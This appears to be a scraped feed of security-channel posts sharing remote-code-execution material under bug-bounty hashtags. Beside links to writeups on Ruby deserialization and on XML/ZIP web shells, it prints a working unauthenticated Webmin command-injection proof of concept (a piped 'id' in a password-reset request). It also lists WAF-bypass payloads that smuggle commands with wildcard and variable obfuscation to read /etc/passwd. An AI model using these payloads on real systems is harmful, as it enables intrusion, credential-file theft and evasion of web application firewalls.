Something special for the weekend...: A nice writeup on Universal #RCE #exploit by exploiting #Ruby 2.x #serialization
https://www.elttam.com.au/blog/ruby-deserialization/
Forwarded from امنیت اطلاعات
"Webmin 0day remote code execution"
PoC:
/password_reset.cgi
user=root&pam&expired&old=wrong | id
https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
#webmin
#exploit
#rce
@sec_nerd
#WAF #ModSecurity #RCE #Payloads Detection #Bypass
;+$u+cat+/etc$u/passwd$u
;+$u+cat+/etc$u/passwd+\#
/???/??t+/???/??ss??
/?in/cat+/et?/passw?
#RCE
https://t.co/F9of890IQh
https://t.co/dTuAIHIk7t
https://t.co/LNe2A8xwOM
https://t.co/8BCSrzAo72
https://t.co/qPB62I7qNo
https://t.co/XdwFJjUCVX
https://t.co/j9Db6GVmp7
https://t.co/NdhxcUnIs6
https://t.co/Z364swmX8G
#bugbounty,#bugbountytips
spaceraccoon.dev
A Tale of Two Formats: Exploiting Insecure XML and ZIP File Parsers to Create a Web Shell — spaceraccoon.dev
XML and ZIP - A Tale as Old As Time While researching a bug bounty target, I came across a web application that processed a custom file ...